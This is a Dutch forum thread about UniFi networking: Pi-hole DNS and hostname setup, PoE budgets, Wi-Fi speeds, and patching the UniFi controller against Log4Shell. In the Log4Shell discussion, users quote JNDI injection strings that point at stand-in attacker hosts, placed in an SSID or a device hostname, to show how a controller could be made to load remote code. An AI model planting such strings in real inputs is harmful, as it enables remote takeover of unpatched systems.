- Hosts in de /etc/hosts van de USG zetten
- De /etc/dnsmasq.d/dnsmasq.static.conf van de USG aanmaken en aanpassen
- Alles via PiHole/Unbound laten lopen?
Iemand hier wat advies voor?
Cloud ☁️
Als je de USG hebt dan neem ik aan dat je ook de controller gebruikt, in dat geval is het een kwestie van de client aanklikken in de lijst met clients, en daar een vast ip inschakelen.Ben.Hahlen schreef op maandag 13 december 2021 @ 11:00:
Ik heb nu ook een USG draaien (yay).
Nu had ik in mijn vorige setup (OpenWRT) allemaal DHCP entries vastgezet en kon ik deze allemaal netjes vinden op Hostname.
Nu probeer ik datzelfde te bereiken met de USG, maar dat is toch iets lastiger, ik heb e.e.a. al in de Clients gezet met een vast IP adres.
Situatieschets:
Server draait Docker met een aantal containers, zoals bv Homeassistant. Deze hoort bereikbaar te zijn op homeassistant.home.
Docker is opgezet met MACVlan, dus alle containers hebben een MAC Adres en IP, ivm PiHole (draait in een container en op een Pi)
Deze pingen vanaf een laptop of de USG zelf werkt niet.
In OpenWRT had ik dergelijke entries:
code:
1 2 3 4 5 config host option name 'PiHole' option mac '02:42:AC:11:20:11' option ip '192.168.2.11' option dns '1'
Nu zijn er, voor zover ik kan zien, een aantal opties om dit op de "juiste" manier in te richten:De makkelijkste optie lijkt mij optie 2, de meest "robuuste" waarschijnlijk optie 3 (want ik zou dan unbound gebruiken ook op de Pi, dus als de Docker variant down gaat (om wat voor reden dan ook) heb ik altijd de back up nog)?
- Hosts in de /etc/hosts van de USG zetten
- De /etc/dnsmasq.d/dnsmasq.static.conf van de USG aanmaken en aanpassen
- Alles via PiHole/Unbound laten lopen?
Iemand hier wat advies voor?
'Client Devices' -> Klik op de client -> Sidepane 'Settings' -> 'Use Fixed IP Address' aanzetten.
Ja, dat heb ik ook gelezen, maar dat zou je weer kunnen ondervangen met een config.gateway.json, als ik het goed begrepen hebHKLM_ schreef op maandag 13 december 2021 @ 11:21:
[...]
Optie 2 is de makkelijkste maar gaat wel verloren bij een update van de firmware was mijn ervaring toen
Ja, dat klopt ook, maar dat doet niks met de hostname resolutie.mrdemc schreef op maandag 13 december 2021 @ 11:31:
[...]
Als je de USG hebt dan neem ik aan dat je ook de controller gebruikt, in dat geval is het een kwestie van de client aanklikken in de lijst met clients, en daar een vast ip inschakelen.
'Client Devices' -> Klik op de client -> Sidepane 'Settings' -> 'Use Fixed IP Address' aanzetten.
Wilde net een edit toevoegen met dat ik de vraag niet helemaal goed gelezen hadBen.Hahlen schreef op maandag 13 december 2021 @ 11:33:
[...]
Ja, dat heb ik ook gelezen, maar dat zou je weer kunnen ondervangen met een config.gateway.json, als ik het goed begrepen heb
[...]
Ja, dat klopt ook, maar dat doet niks met de hostname resolutie.
Maar als je de PiHole als DNS server gebruikt, kun je Conditional Forwarding gebruiken voor je lokale netwerk. Daarmee zorg je ervoor dat je router de DNS lookups geforwarded krijgt vanuit de pihole voor de lokale apparaten.
Conditional forwarding
If not configured as your DHCP server, Pi-hole typically won't be able to determine the names of devices on your local network. As a result, tables such as Top Clients will only show IP addresses.
One solution for this is to configure Pi-hole to forward these requests to your DHCP server (most likely your router), but only for devices on your home network. To configure this we will need to know the IP address of your DHCP server and which addresses belong to your local network. Exemplary input is given below as placeholder in the text boxes (if empty).
Ja, dat heb ik ook :-)mrdemc schreef op maandag 13 december 2021 @ 11:35:
[...]
Wilde net een edit toevoegen met dat ik de vraag niet helemaal goed gelezen had
Maar als je de PiHole als DNS server gebruikt, kun je Conditional Forwarding gebruiken voor je lokale netwerk. Daarmee zorg je ervoor dat je router de DNS lookups geforwarded krijgt vanuit de pihole voor de lokale apparaten.
[...]
Maar waar bij OpenWRT het registreren van een vast DHCP adres ook gelijk er voor zorgde dat de DNS goed werkte, is dat bij de USG niet zo, vandaar de vraag
Ik heb dezelfde set-up met PiHole en lokale dns entries via de DHCP van de router, dus dat zou wel moeten werken. Zie je ook geen hostnamen in de pi-hole logs van de apparaten die een lookup doen?Ben.Hahlen schreef op maandag 13 december 2021 @ 11:48:
[...]
Ja, dat heb ik ook :-)
Maar waar bij OpenWRT het registreren van een vast DHCP adres ook gelijk er voor zorgde dat de DNS goed werkte, is dat bij de USG niet zo, vandaar de vraag
Ik heb wel een lokaal domein ingesteld op m'n netwerk ([domein].local) dus het zou kunnen dat het daaraan ligt. Heb je al een lookup geprobeerd met .local erachter, of door in het netwerk via de controller een domain name in te stellen?
Dit had ik, maar ik heb het weer uitgezet. Er kwamen meldingen dat het ip van de UDM tijdelijk werd begrensd omdat er teveel requests kwamen.mrdemc schreef op maandag 13 december 2021 @ 11:35:
[...]
Wilde net een edit toevoegen met dat ik de vraag niet helemaal goed gelezen had
Maar als je de PiHole als DNS server gebruikt, kun je Conditional Forwarding gebruiken voor je lokale netwerk. Daarmee zorg je ervoor dat je router de DNS lookups geforwarded krijgt vanuit de pihole voor de lokale apparaten.
[...]
Het leek op een soort loop. Ik ben er niet verder ingedoken.
Misschien hebben jullie een tip.
Be small, act BIG.
Ik heb verder niks aan de setup van PiHole gewijzigd.mrdemc schreef op maandag 13 december 2021 @ 11:56:
[...]
Ik heb dezelfde set-up met PiHole en lokale dns entries via de DHCP van de router, dus dat zou wel moeten werken. Zie je ook geen hostnamen in de pi-hole logs van de apparaten die een lookup doen?
Ik heb wel een lokaal domein ingesteld op m'n netwerk ([domein].local) dus het zou kunnen dat het daaraan ligt. Heb je al een lookup geprobeerd met .local erachter, of door in het netwerk via de controller een domain name in te stellen?
PiHole Config:
Upstream DNS: Custom 1 - 192.168.2.1 (= IP van USG)
Checked - Never forward non-FQDN A and AAAA queries
Checked - Never forward reverse lookups for private IP ranges
Conditional forwarding:
Local Network: 192.168.2.0/24
IP Address of DHCP: 192.168.2.1
Local Domain Name: home
USG Config:
Network -> LAN:
Domain name: home
DHCP Name Server: Manual (met 2 IP's van de 2 PiHole's)
DHCP Gateway IP: Auto
DHCP Network Application: <IP Van Controller>
Dat lijken mij de relevante settings, tenzij ik iets gemist heb
Inderdaad iets gemistBen.Hahlen schreef op maandag 13 december 2021 @ 12:12:
[...]
Ik heb verder niks aan de setup van PiHole gewijzigd.
PiHole Config:
Upstream DNS: Custom 1 - 192.168.2.1 (= IP van USG)
Checked - Never forward non-FQDN A and AAAA queries
Checked - Never forward reverse lookups for private IP ranges
Conditional forwarding:
Local Network: 192.168.2.0/24
IP Address of DHCP: 192.168.2.1
Local Domain Name: home
USG Config:
Network -> LAN:
Domain name: home
DHCP Name Server: Manual (met 2 IP's van de 2 PiHole's)
DHCP Gateway IP: Auto
DHCP Network Application: <IP Van Controller>
Dat lijken mij de relevante settings, tenzij ik iets gemist heb
Er staat onderin de uitleg van Conditional Forwarding de volgende regel, wat in dit geval misschien van belang is:
Hoewel het insinueert dat het dat ook doet als het wel enabled is, kan dat wel het verschil maken. Vooral gelet op de uitleg bij de twee opties:Enabling Conditional Forwarding will also forward all hostnames (i.e., non-FQDNs) to the router when "Never forward non-FQDNs" is not enabled.
Important: Enabling these two options may increase your privacy, but may also prevent you from being able to access local hostnames if the Pi-hole is not used as DHCP server.
Door wie werd het IP begrensd en wat gaf de melding?thaMini schreef op maandag 13 december 2021 @ 12:09:
[...]
Dit had ik, maar ik heb het weer uitgezet. Er kwamen meldingen dat het ip van de UDM tijdelijk werd begrensd omdat er teveel requests kwamen.
Het leek op een soort loop. Ik ben er niet verder ingedoken.
Misschien hebben jullie een tip.
[ Voor 27% gewijzigd door mrdemc op 13-12-2021 12:32 ]
Begrensd door Pi-hole. IP van de router (de UDM).mrdemc schreef op maandag 13 december 2021 @ 12:30:
[...]
Door wie werd het IP begrensd en wat gaf de melding?
Be small, act BIG.
Dan heb je inderdaad een loop gemaaktthaMini schreef op maandag 13 december 2021 @ 12:40:
[...]
Begrensd door Pi-hole. IP van de router (de UDM).
Je hebt dan waarschijnlijk de DNS van de WAN naar de Pi Hole gezet, maar eigenlijk zou je de DNS van de LAN (dhcp-option) op de PiHole moeten zetten en de DNS van de WAN op dezelfde WAN DNS waar de Pi Hole op staat. Dan gaan de apparaten op je netwerk rechtstreeks naar de pi-hole met de DNS verzoeken en alles wat niet door de pihole kan worden opgepakt gaat naar de WAN DNS, behalve de lokale hosts, die gaan via de router. Als de router dan zelf een dns request doet, zal deze ook weer via de WAN DNS gaan, maar dat is in principe geen probleem, die zal alleen verzoeken doen als dat nodig is vanuit de router intern (dus bijv. voor de controller hostnaam, ophalen van gegevens bij unifi, etc.).
Dit hoort eigenlijk meer in het Pi-hole topic thuis natuurlijk, maar waar moet ik dan de UDM naar laten verwijzen?
De Pi-hole draait op dezelfde RPi als de Unbound DNS server. Die hebben hetzelfde ip. Kan ik poortnummers gebruiken in de DNS settings van de WAN zodat deze direct bij de Unbound uitkomt en niet bij de Pi-hole?
De Pi-hole draait op dezelfde RPi als de Unbound DNS server. Die hebben hetzelfde ip. Kan ik poortnummers gebruiken in de DNS settings van de WAN zodat deze direct bij de Unbound uitkomt en niet bij de Pi-hole?
[ Voor 16% gewijzigd door thaMini op 13-12-2021 16:02 . Reden: Tekst soort van verduidelijkt ]
Be small, act BIG.
in de controller bij 'Internet' -> 'DNS Server' zet ik in principe de primary server op dezelfde waarde als de upstream DNS server van de Pi-Hole. (ik browse niet 'op' de router, dus die hoeft niet op die manier gefilterd te worden door de pi-hole)thaMini schreef op maandag 13 december 2021 @ 15:59:
Dit hoort eigenlijk meer in het Pi-hole topic thuis natuurlijk, maar waar moet ik dan de UDM naar laten verwijzen?
De Pi-hole draait op dezelfde RPi als de unbound DNS server. Kan ik poortnummers gebruiken in de DNS settings van de WAN?
Maar jij geeft aan dat je een eigen unbound dns server draait waar pi-hole z'n upstream naartoe stuurt. Als je de pi-hole documentatie hebt gebruikt, dan zal de unbound server onbereikbaar zijn voor je router, omdat de unbound server alleen op 127.0.0.1 luistert via een aparte poort. Je kunt daarmee de upstream DNS van jouw router niet naar dezelfde upstream sturen als jouw pi-hole. Ik zou dan toch ervoor kiezen om de UDM upstream DNS in te stellen op de provider-default of een andere externe DNS server.
Als je dat niet wilt zou je moeten uitzoeken of je de UDM via een andere poort dan 53 dns verzoeken kan laten uitvoeren (werkt het bijv. als je het IP met #5335 in de primary server veld invoert). zo ja, dan zou je dat kunnen overwegen en de unbound server ook laten luisteren op het extern ip van de rpi en verzoeken allow'en vanuit het ip van je router (ik zou dan alle andere ip's deny'en).
Mocht dat niet zo zijn zou je een lokale port-forward kunnen overwegen vanuit het ip van de router, maar dan wordt het wel nog wat complexer.
[ Voor 4% gewijzigd door mrdemc op 13-12-2021 16:15 ]
Zojuist geupdate naar UniFi Network Application 6.5.54 op Raspbery Pi met Home Assistant.
Hierna staat mijn hardware op Pending Adoptation. Mijn Switch heb ik maar toegevoegd omdat hier weinig configuratie op zat echter mijn 2 U6-Lite AP's vergen wat meer config dus dit heb ik nog niet aangedurfd. Hoe kan het zijn dat dit nodig is? Iemand tips over hoe ik mijn config terug krijg?
Log vanuit HA:
[15:48:40] INFO: Now starting the UniFi Network Application...
[15:48:40] INFO: Note: No add-on specific logs beyond this point.
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:585 STUN id: 6; fd: 249 172.30.33.3:53040 -> xxx.xxx.15.250:41879 (eth0) DTLS id: 29 (xxx.xxx.234.115:53040) (PEER) timed out
:906 webRtcId 1 terminated with code: (-2147090409) WebRTC connection interrupted from far side
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:585 STUN id: 6; fd: 245 172.30.33.3:54315 -> xxx.xxx.15.250:46377 (eth0) DTLS id: 29 (xxx.xxx.234.115:54315) (PEER) timed out
:906 webRtcId 2 terminated with code: (-2147090409) WebRTC connection interrupted from far side
:585 STUN id: 7; fd: 248 172.30.33.3:46622 -> xxx.xxx.18.154:57898 (eth0) DTLS id: 19 (xxx.xxx.234.115:46622) (PEER) timed out
:906 webRtcId 3 terminated with code: (-2147090409) WebRTC connection interrupted from far side
Hierna staat mijn hardware op Pending Adoptation. Mijn Switch heb ik maar toegevoegd omdat hier weinig configuratie op zat echter mijn 2 U6-Lite AP's vergen wat meer config dus dit heb ik nog niet aangedurfd. Hoe kan het zijn dat dit nodig is? Iemand tips over hoe ik mijn config terug krijg?
Log vanuit HA:
[15:48:40] INFO: Now starting the UniFi Network Application...
[15:48:40] INFO: Note: No add-on specific logs beyond this point.
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:585 STUN id: 6; fd: 249 172.30.33.3:53040 -> xxx.xxx.15.250:41879 (eth0) DTLS id: 29 (xxx.xxx.234.115:53040) (PEER) timed out
:906 webRtcId 1 terminated with code: (-2147090409) WebRTC connection interrupted from far side
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:585 STUN id: 6; fd: 245 172.30.33.3:54315 -> xxx.xxx.15.250:46377 (eth0) DTLS id: 29 (xxx.xxx.234.115:54315) (PEER) timed out
:906 webRtcId 2 terminated with code: (-2147090409) WebRTC connection interrupted from far side
:585 STUN id: 7; fd: 248 172.30.33.3:46622 -> xxx.xxx.18.154:57898 (eth0) DTLS id: 19 (xxx.xxx.234.115:46622) (PEER) timed out
:906 webRtcId 3 terminated with code: (-2147090409) WebRTC connection interrupted from far side
De PoE budgetten die genoemd worden, bijv. bij de Gen2 switches, hoe moet ik die zien? Is dat peak of continue? Ik wil een stuk of 4 AP's ophangen en in de toekomst nog een camera oid, dan is de 43W van de 16 poorts switch echt wel krap denk ik he? En dat terwijl ik helemaal niet zoveel poorten nodig heb denk ik.
Het PoE vermogen van de clients is een piekvermogen. AP's komen in de praktijk niet boven de 3-4W uit, dus ik denk dat het wel gaat lukken met die 43W van je switch.Servor schreef op maandag 13 december 2021 @ 16:20:
De PoE budgetten die genoemd worden, bijv. bij de Gen2 switches, hoe moet ik die zien? Is dat peak of continue? Ik wil een stuk of 4 AP's ophangen en in de toekomst nog een camera oid, dan is de 43W van de 16 poorts switch echt wel krap denk ik he? En dat terwijl ik helemaal niet zoveel poorten nodig heb denk ik.
Hier moet alle shit staan die ik heb.
Ja, maar als ik die opties disable krijg ik de volgende zaken in het log:mrdemc schreef op maandag 13 december 2021 @ 12:30:
[...]
Inderdaad iets gemist
Er staat onderin de uitleg van Conditional Forwarding de volgende regel, wat in dit geval misschien van belang is:
[...]
Hoewel het insinueert dat het dat ook doet als het wel enabled is, kan dat wel het verschil maken. Vooral gelet op de uitleg bij de twee opties:
[...]
107.2.168.192.in-addr.arpa
en dat hoort volgens mij ook niet.
Heb nu ff beide PiHoles restart (en een paar docker containers), maar het lijkt nog geen verschil te maken.
Dat is dus mijn angst om niet zomaar blind een update van UI te vertrouwen. Hopelijk heb je wel een goede backup gemaakt zodat je snel terug kunt naar de vorige versie. Containers runnen is dan toch wel een fijne oplossing.WhiteAss schreef op maandag 13 december 2021 @ 16:15:
Zojuist geupdate naar UniFi Network Application 6.5.54 op Raspbery Pi met Home Assistant.
Hierna staat mijn hardware op Pending Adoptation. Mijn Switch heb ik maar toegevoegd omdat hier weinig configuratie op zat echter mijn 2 U6-Lite AP's vergen wat meer config dus dit heb ik nog niet aangedurfd. Hoe kan het zijn dat dit nodig is? Iemand tips over hoe ik mijn config terug krijg?
Log vanuit HA:
[15:48:40] INFO: Now starting the UniFi Network Application...
[15:48:40] INFO: Note: No add-on specific logs beyond this point.
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:585 STUN id: 6; fd: 249 172.30.33.3:53040 -> xxx.xxx.15.250:41879 (eth0) DTLS id: 29 (xxx.xxx.234.115:53040) (PEER) timed out
:906 webRtcId 1 terminated with code: (-2147090409) WebRTC connection interrupted from far side
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:118 TCP candidates not supported yet
:1023 Permanent error code on channel bind request: 403 - Forbidden IP
:484 All TURN channel bindings failed
:585 STUN id: 6; fd: 245 172.30.33.3:54315 -> xxx.xxx.15.250:46377 (eth0) DTLS id: 29 (xxx.xxx.234.115:54315) (PEER) timed out
:906 webRtcId 2 terminated with code: (-2147090409) WebRTC connection interrupted from far side
:585 STUN id: 7; fd: 248 172.30.33.3:46622 -> xxx.xxx.18.154:57898 (eth0) DTLS id: 19 (xxx.xxx.234.115:46622) (PEER) timed out
:906 webRtcId 3 terminated with code: (-2147090409) WebRTC connection interrupted from far side
Mij is nog niet helemaal duidelijk wat er gebeurd is en welke actie de boel weer online gebracht heeft maar het is gelukt.
Ik heb eerst de backup van UniFi Network Application terug gezet. Dit had nog niet het gewenste resultaat. Daarna de 6.5.54 opnieuw geïnstalleerd. Hiernaar HA geupdate en vervolgens draaide het weer. Heb niets met backups vanuit UniFi Network Application gedaan (deze had ik uiteraard ook). Maar mij is de wisselwerking tussen de UniFi Network Application en de configuratie op de AP's niet helemaal helder. Weet daarom ook niet of dit kansrijker geweest was.
Dat is dan ook een vraag die overblijft en hopelijk door iemand beantwoord kan worden. Zit in de backup van die je in UniFi Network Application kunt maken de config van de AP's?
Edit: Dat betreft blind updaten. Dit was hier niet het geval ik had echter wat meer haast omdat het een ernstig veiligheids risico betreft.
Ik heb eerst de backup van UniFi Network Application terug gezet. Dit had nog niet het gewenste resultaat. Daarna de 6.5.54 opnieuw geïnstalleerd. Hiernaar HA geupdate en vervolgens draaide het weer. Heb niets met backups vanuit UniFi Network Application gedaan (deze had ik uiteraard ook). Maar mij is de wisselwerking tussen de UniFi Network Application en de configuratie op de AP's niet helemaal helder. Weet daarom ook niet of dit kansrijker geweest was.
Dat is dan ook een vraag die overblijft en hopelijk door iemand beantwoord kan worden. Zit in de backup van die je in UniFi Network Application kunt maken de config van de AP's?
Edit: Dat betreft blind updaten. Dit was hier niet het geval ik had echter wat meer haast omdat het een ernstig veiligheids risico betreft.
[ Voor 8% gewijzigd door WhiteAss op 13-12-2021 17:31 . Reden: toevoeging ]
- nero355
- Registratie: Februari 2002
- Laatst online: 28-02 22:21
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
:strip_exif()/u/49248/DPCkoeienUD.gif?f=community)
Ben.Hahlen schreef op maandag 13 december 2021 @ 11:00:
Ik heb nu ook een USG draaien (yay).
Nu had ik in mijn vorige setup (OpenWRT) allemaal DHCP entries vastgezet en kon ik deze allemaal netjes vinden op Hostname.
Nu probeer ik datzelfde te bereiken met de USG, maar dat is toch iets lastiger, ik heb e.e.a. al in de Clients gezet met een vast IP adres.
Iemand hier wat advies voor?
Mijn TIP zal voor altijd blijven :thaMini schreef op maandag 13 december 2021 @ 12:09:
Misschien hebben jullie een tip.
- Static DHCP IP Mappings op basis van het MAC adres in de UniFi Controller.
- Local DNS Records in Pi-Hole voor elk van die IP adressen.
Kan tegenwoordig ook via de webGUI van Pi-Hole zelfs dus je hebt geen enkel excuus meer om het niet te doen!
Falcon10 schreef op maandag 13 december 2021 @ 08:33:
Blijkbaar is de Unifi Network Application vatbaar voor het log4shell security lek.
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !)
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
Is al besproken ondertussen dus lees dit eens : ANdrode in "[Ubiquiti-Netwerkapparatuur] Ervaringen & Discussie - Deel 4"Miki schreef op maandag 13 december 2021 @ 10:29:
Hoe realistisch is jouw scenario voor de huis, tuin en keukengebruikers als je je controller alleen lokaal draait en dus zonder remote toegang?
En alle andere reacties die erbij horen
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
Wat dat betekent, is dat het IP 192.168.2.107 opgezocht wordt door een systeem om de hostnaam te achterhalen. in feite is dat een opdracht alsBen.Hahlen schreef op maandag 13 december 2021 @ 16:59:
[...]
Ja, maar als ik die opties disable krijg ik de volgende zaken in het log:
107.2.168.192.in-addr.arpa
en dat hoort volgens mij ook niet.
Heb nu ff beide PiHoles restart (en een paar docker containers), maar het lijkt nog geen verschil te maken.
code:
en dat wordt door pi-hole vervolgens vertaald naar een domein (kun je daarmee ook reproduceren). Dat betekent verder niets en betekent juist (mits de router dan het verzoek beantwoord) dat het goed gaat. Waarschijnlijk is het de pi-hole in dit geval die probeert te achterhalen wat de hostnaam is van het systeem dat een DNS verzoek doet (bron zou je moeten kunnen zien).1
| nslookup 192.168.2.107 |
Dit gaat trouwens over het tweede vinkje. Als je puur van hostnaam naar IP wilt kunnen resolven is het aanzetten van het tweede vinkje in principe geen probleem zover ik weet.
Die post heb ik even gemistnero355 schreef op maandag 13 december 2021 @ 17:43:
[...]
[...]
Mijn TIP zal voor altijd blijven :
- Static DHCP IP Mappings op basis van het MAC adres in de UniFi Controller.
- Local DNS Records in Pi-Hole voor elk van die IP adressen.
Kan tegenwoordig ook via de webGUI van Pi-Hole zelfs dus je hebt geen enkel excuus meer om het niet te doen!
[...]
[...]
Is al besproken ondertussen dus lees dit eens : ANdrode in "[Ubiquiti-Netwerkapparatuur] Ervaringen & Discussie - Deel 4"
En alle andere reacties die erbij horen
Ik tel mijn zegeningen wel totdat ik zeker weet dat ik pijnloos kan upgraden. Track record van UI is niet bepaald vlekkeloos gebleken is mijn eigen ervaring.
Het scenario waarin ik getroffen kan worden acht ik te klein vs de down time en daaropvolgende toorn van mijn gezin.
Zolang je de controller lokaal draait is er weinig directe dreiging. Maar als je hem via internet laat draaien op een andere locatie (handig bij een multi-site setup) dan is het verstandig direct te patchen of de workaround te gebruiken.Miki schreef op maandag 13 december 2021 @ 17:59:
[...]
Die post heb ik even gemist
Ik tel mijn zegeningen wel totdat ik zeker weet dat ik pijnloos kan upgraden. Track record van UI is niet bepaald vlekkeloos gebleken is mijn eigen ervaring.
Het scenario waarin ik getroffen kan worden acht ik te klein vs de down time en daaropvolgende toorn van mijn gezin.
Zie hieronder:Tonne schreef op maandag 13 december 2021 @ 18:10:
[...]
Zolang je de controller lokaal draait is er weinig directe dreiging. Maar als je hem via internet laat draaien op een andere locatie (handig bij een multi-site setup) dan is het verstandig direct te patchen of de workaround te gebruiken.
Daarmee kun je dus in feite een script plaatsen die om de zoveel tijd een c&c server benaderd om opdrachten op te ontvangen en data te versturen, daarvoor heb je geen directe toegang tot de controller nodig als aanvaller, dus wat je zegt is niet waarANdrode schreef op zaterdag 11 december 2021 @ 16:56:
[...]
Er zijn echt wel meer manieren om dit te exploiteren. Elk pad waarbij je een bericht in de controller forceert ('duplicate BSSID gezien') kan dit potentieel veroorzaken.
En ${jndi:ldap://host.io/a} past in een SSID naam
Wat wel waar is, is dat je je eigen afweging moet maken natuurlijk, maar dan wel op basis van juiste informatie.
[ Voor 3% gewijzigd door mrdemc op 13-12-2021 18:19 ]
sinds kort weigeren mijn devices (OnePlus 6 en 8T met Android 11) te roamen naar een andere AP.
Pas als echt de verbinding wegvalt pakken ze de andere op.
Ik heb echt geen idee wat ik er aan kan doen om ze, automatisch, het andere AP op te laten pakken.
Al die apps via de playstore helpen niet.
Ik heb met de 802.11r/v etc geprobeerd, maar dat helpt ook niet.
Pas als echt de verbinding wegvalt pakken ze de andere op.
Ik heb echt geen idee wat ik er aan kan doen om ze, automatisch, het andere AP op te laten pakken.
Al die apps via de playstore helpen niet.
Ik heb met de 802.11r/v etc geprobeerd, maar dat helpt ook niet.
[ Voor 22% gewijzigd door BushWhacker op 13-12-2021 19:07 ]
Freedom FttH - EdgeRouter 4 SFP - OnePlus 8T - Debian - Home Assistant
Jij hebt unifi controllers direct aan het internet hangen en opvraagbaar voor iedereen?Tonne schreef op maandag 13 december 2021 @ 18:10:
[...]
Zolang je de controller lokaal draait is er weinig directe dreiging. Maar als je hem via internet laat draaien op een andere locatie (handig bij een multi-site setup) dan is het verstandig direct te patchen of de workaround te gebruiken.

Cloud ☁️
Dus als ik m'n toestel een hostname geef als ${jndi:ldap://attackerserver.com.com/x} en probeer te connecteren op je wifi, dan ben ik binnen, juist?
Eentje en neeHKLM_ schreef op maandag 13 december 2021 @ 19:41:
[...]
Jij hebt unifi controllers direct aan het internet hangen en opvraagbaar voor iedereen?
Creatieve keuze! Dat is geen geldige hostnaam denk ik dus deze gaat niet op denk ikKr7Br schreef op maandag 13 december 2021 @ 20:28:
Dus als ik m'n toestel een hostname geef als ${jndi:ldap://attackerserver.com.com/x} en probeer te connecteren op je wifi, dan ben ik binnen, juist?

Ik zou er vanuit gaan dat er een pad is dat een aanvaller kan gebruiken om de controller over te nemen. De proof of concept is niet nodig als het risico aannemelijk is?
Tijdje geleden heb ik mijn U6 Pro in gebruik genomen.
Toen zitten meten op 802.11ax snelheid met een iPhone. Max toen iets van 600 Mb/s.
Maar wat zie ik nu tot mijn grote verbazing...
Ik zit nog een uurtje te werken op de Lenovo T590 en zie opeens dat mijn wifi adapter 866 Mb/s aangeeft.
Adapter is een Intel a9560, deze heeft 2x2. Op 802.11ac wel te verstaan.
Als ik het goed heb is dat het theoretische maximum voor 2x2? Maar ik haal het nu gewoon. Notabene op ac, niet eens ax (dat heeft deze laptop niet).
Maar is dat normaal? Ik dacht dat je dat soort snelheden niet kon halen.
Toen zitten meten op 802.11ax snelheid met een iPhone. Max toen iets van 600 Mb/s.
Maar wat zie ik nu tot mijn grote verbazing...
Ik zit nog een uurtje te werken op de Lenovo T590 en zie opeens dat mijn wifi adapter 866 Mb/s aangeeft.
Adapter is een Intel a9560, deze heeft 2x2. Op 802.11ac wel te verstaan.
Als ik het goed heb is dat het theoretische maximum voor 2x2? Maar ik haal het nu gewoon. Notabene op ac, niet eens ax (dat heeft deze laptop niet).
Maar is dat normaal? Ik dacht dat je dat soort snelheden niet kon halen.
8.960 Wp - 16 kW Daikin L/W - 2 x MHI L/L - gasloos sinds 2017 - Loxone - SAP/IS-U/ABAP - rijdt nog LPG ;-)
Al gegoogled? Het zijn app trackers.HKLM_ schreef op maandag 13 december 2021 @ 20:55:
Via ios 15.2 haal ik naar boven dat mijn unifi app onderstaande domeinen aanspreekt. Iemand een idee welke de eerste en de vijfde doen?
[Afbeelding]
AC kan theoretisch tot 7Gbps halen.psy schreef op maandag 13 december 2021 @ 21:25:
Tijdje geleden heb ik mijn U6 Pro in gebruik genomen.
Toen zitten meten op 802.11ax snelheid met een iPhone. Max toen iets van 600 Mb/s.
Maar wat zie ik nu tot mijn grote verbazing...
Ik zit nog een uurtje te werken op de Lenovo T590 en zie opeens dat mijn wifi adapter 866 Mb/s aangeeft.
Adapter is een Intel a9560, deze heeft 2x2. Op 802.11ac wel te verstaan.
Als ik het goed heb is dat het theoretische maximum voor 2x2? Maar ik haal het nu gewoon. Notabene op ac, niet eens ax (dat heeft deze laptop niet).
Maar is dat normaal? Ik dacht dat je dat soort snelheden niet kon halen.
WiFi 6 is meer ontwikkeld voor de dichtheid. Steeds meer gebruikers.
AX werkt standaard dmv MU-MIMO. Terwijl AC ook met MU-MIMO overweg kan. Tot Max 4x4.
Weegt het prijskaartje tov WIFI5?? Uhh ja denk het wel langzaam zie je steeds meer AX compatibel devices komen. Merk je er in praktijk iets van?? Ja op de 2,4GHZ band wel.
A Soldiers manual and a pair of boots.
De maximum verbindingssnelheid van wifi 5 (AC) is 866 Mbps voor een 2x2 client bij 80 MHz kanaalbreedte.psy schreef op maandag 13 december 2021 @ 21:25:
Tijdje geleden heb ik mijn U6 Pro in gebruik genomen.
Toen zitten meten op 802.11ax snelheid met een iPhone. Max toen iets van 600 Mb/s.
Maar wat zie ik nu tot mijn grote verbazing...
Ik zit nog een uurtje te werken op de Lenovo T590 en zie opeens dat mijn wifi adapter 866 Mb/s aangeeft.
Adapter is een Intel a9560, deze heeft 2x2. Op 802.11ac wel te verstaan.
Als ik het goed heb is dat het theoretische maximum voor 2x2? Maar ik haal het nu gewoon. Notabene op ac, niet eens ax (dat heeft deze laptop niet).
Maar is dat normaal? Ik dacht dat je dat soort snelheden niet kon halen.
@psy Als je de kanaalbreedte op de U6-Pro instelt op 160 MHz heb je kans dat de snelheid nóg hoger wordt, want de AC9560 kan op 160MHz verbinden; maximaal 1.73 Gbps. (Dat doet ie niet altijd, weet ik uit ervaring).
[ Voor 11% gewijzigd door Masimo op 13-12-2021 23:12 ]
